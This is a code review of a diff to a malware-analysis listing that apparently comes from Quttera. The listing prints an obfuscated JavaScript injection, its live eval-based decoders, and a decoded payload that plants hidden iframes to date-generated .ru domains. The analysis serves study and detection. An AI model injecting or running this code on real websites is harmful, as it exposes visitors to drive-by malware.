| 1 | /****************************** | |
| 2 | * Quttera Web Malware monitor detected malicious JavaScript code | |
| 3 | * that use multiple levels of obfuscation. Decoded payload generates | |
| 4 | * hidden iframes to random websites located under *.ru | |
| 5 | * | |
| 6 | * Full report could be found here: http://quttera.com/detailed_report/www.ristoranteada.eu | |
| 7 | * | |
| 8 | * The initial threat code | |
| 9 | ******************************/ | |
| 10 | var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
| |
| 11 | document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
| |
| 12 | window.eval(String.fromCharCode(105, 61, 48, 59, 116, 114, 121, 123, 112, 114, 111, 116, 111, 116, 121, 112, 101, 45, 53, 59, 125, 99, 97, 116, 99, 104, 40, 122, 41, 123, 102, 61, 91, 49, 48, 50, 44, ... 116, 114, 121, 123, 113, 61, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 98, 34, 41, 59, 105, 102, 40, 101, 41, 113, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 113, 43, 34, 34, 41, 59, 125, 99, 97, 116, 99, 104, 40, 102, 119, 98, 101, 119, 101, 41, 123, 119, 61, 102, 59, 115, 61, 91, 93, 59, 125, 13, 10, 114, 61, 83, 116, 114, 105, 110, 103, 59, 122, 61, 40, 40, 101, 41, 63, 34, 67, 111, 100, 101, 34, 58, 34, 34, 41, 59, 102, 111, 114, 40, 59, 49, 51, 51, 51, 45, 53, 43, 53, 62, 105, 59, 105, 43, 61, 49, 41, 123, 106, 61, 105, 59, 105, 102, 40, 101, 41, 115, 61, 115, 43, 114, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 40, 119, 91, 106, 93, 47, 40, 50, 45, 49, 43, 106, 37, 50, 41, 41, 41, 59, 125, 13, 10, 105, 102, 40, 102, 41, 101, 40, 115, 41, 59)); | |
| 13 | ||
| 14 | /******************************************************* | |
| 15 | * First level of decryption | |
| 16 | - | ******************************************************* |
| 16 | + | *******************************************************/ |
| 17 | i = 0; | |
| 18 | try {
| |
| 19 | prototype - 5; | |
| 20 | } catch (z) {
| |
| 21 | f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 220, 100, 222, 109, ... 210, 108, 200, 40, 210, 102, 228, 109, 82, 125, 250, 99, 194, 116, 198, 104, 80, 101, 82, 123, 250, 125, 88, 53, 96, 48, 82, 59]; | |
| 22 | v = "e" + "v" + "a"; | |
| 23 | } | |
| 24 | if (v) e = window[v + "l"]; | |
| 25 | try {
| |
| 26 | q = document.createElement("b");
| |
| 27 | if (e) q.appendChild(q + ""); | |
| 28 | } catch (fwbewe) {
| |
| 29 | w = f; | |
| 30 | s = []; | |
| 31 | } | |
| 32 | ||
| 33 | r = String; | |
| 34 | z = ((e) ? "Code" : ""); | |
| 35 | for (; 1333 - 5 + 5 > i; i += 1) {
| |
| 36 | j = i; | |
| 37 | if (e) s = s + r.fromCharCode((w[j] / (2 - 1 + j % 2))); | |
| 38 | } | |
| 39 | if (f) e(s); | |
| 40 | ||
| 41 | /******************************************************************* | |
| 42 | * simplified version of this threat | |
| 43 | *******************************************************************/ | |
| 44 | s = ""; | |
| 45 | i = 0; | |
| 46 | f = [102, 234, 110, 198, 116, 210, 111, 220, 32, 220, 101, 240, 116, 164, 97, 2....]; | |
| 47 | for (; 1333 - 5 + 5 > i; i += 1) { s = s + String.fromCharCode((f[i] / (2 - 1 + i % 2)));}
| |
| 48 | eval(s); | |
| 49 | ||
| 50 | ||
| 51 | /********************************************************************* | |
| 52 | * Decoded payload generates hidden iframes to random domains in *.ru | |
| 53 | * http://<random-domain-name>.ru/runforestrun?sid=cx | |
| 54 | ******************************************************************/ | |
| 55 | function nextRandomNumber() {
| |
| 56 | var hi = this.seed / this.Q; | |
| 57 | var lo = this.seed % this.Q; | |
| 58 | var test = this.A * lo - this.R * hi; | |
| 59 | if (test > 0) {
| |
| 60 | this.seed = test | |
| 61 | } else {
| |
| 62 | this.seed = test + this.M | |
| 63 | } | |
| 64 | return (this.seed * this.oneOverM) | |
| 65 | } | |
| 66 | function RandomNumberGenerator(unix) {
| |
| 67 | var d = new Date(unix * 1000); | |
| 68 | var s = d.getHours() > 12 ? 1 : 0; | |
| 69 | this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF)); | |
| 70 | this.A = 48271; | |
| 71 | this.M = 2147483647; | |
| 72 | this.Q = this.M / this.A; | |
| 73 | this.R = this.M % this.A; | |
| 74 | this.oneOverM = 1.0 / this.M; | |
| 75 | this.next = nextRandomNumber; | |
| 76 | return this | |
| 77 | } | |
| 78 | function createRandomNumber(r, Min, Max) {
| |
| 79 | return Math.round((Max - Min) * r.next() + Min) | |
| 80 | } | |
| 81 | function generatePseudoRandomString(unix, length, zone) {
| |
| 82 | var rand = new RandomNumberGenerator(unix); | |
| 83 | var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']; | |
| 84 | var str = ''; | |
| 85 | for (var i = 0; i < length; i++) {
| |
| 86 | str += letters[createRandomNumber(rand, 0, letters.length - 1)] | |
| 87 | } | |
| 88 | return str + '.' + zone | |
| 89 | } | |
| 90 | setTimeout(function () {
| |
| 91 | try {
| |
| 92 | if (typeof iframeWasCreated2 == "undefined") {
| |
| 93 | iframeWasCreated2 = true; | |
| 94 | var unix = Math.round(+new Date() / 1000); | |
| 95 | var domainName = generatePseudoRandomString(unix, 16, 'ru'); | |
| 96 | ifrm = document.createElement("IFRAME");
| |
| 97 | ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=cx");
| |
| 98 | ifrm.style.width = "0px"; | |
| 99 | ifrm.style.height = "0px"; | |
| 100 | ifrm.style.visibility = "hidden"; | |
| 101 | document.body.appendChild(ifrm) | |
| 102 | } | |
| 103 | } catch (e) {}
| |
| 104 | }, 500); |
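Review bot: Once the `*/` added at line 16 closes the header comment, the first-level decryption listing (lines 17-39) becomes live code that finishes with `if (f) e(s);`, and the simplified version ends with `eval(s);` at line 48, so anyone who runs either listing to reproduce the decoding executes the decoded stage instead of inspecting it. For an analysis listing the decode loop should hand the buffer to the reader, e.g. replace line 48 with `console.log(s);` and line 39 likewise, so the next stage is recovered without being run. Lines 10-11 appear to be the ordinary Google Analytics loader that the injected `window.eval(String.fromCharCode(...))` call was appended to; the header comment could state whether they are considered part of the threat so readers do not flag the benign snippet. The comment at lines 51-54 could also note that the iframe's domain is derived from the month, the day and whether the hour is past 12 via the seeded generator (lines 66-69), which is what makes the `*.ru` target change over time and is the property a blocklist or detection would need to account for.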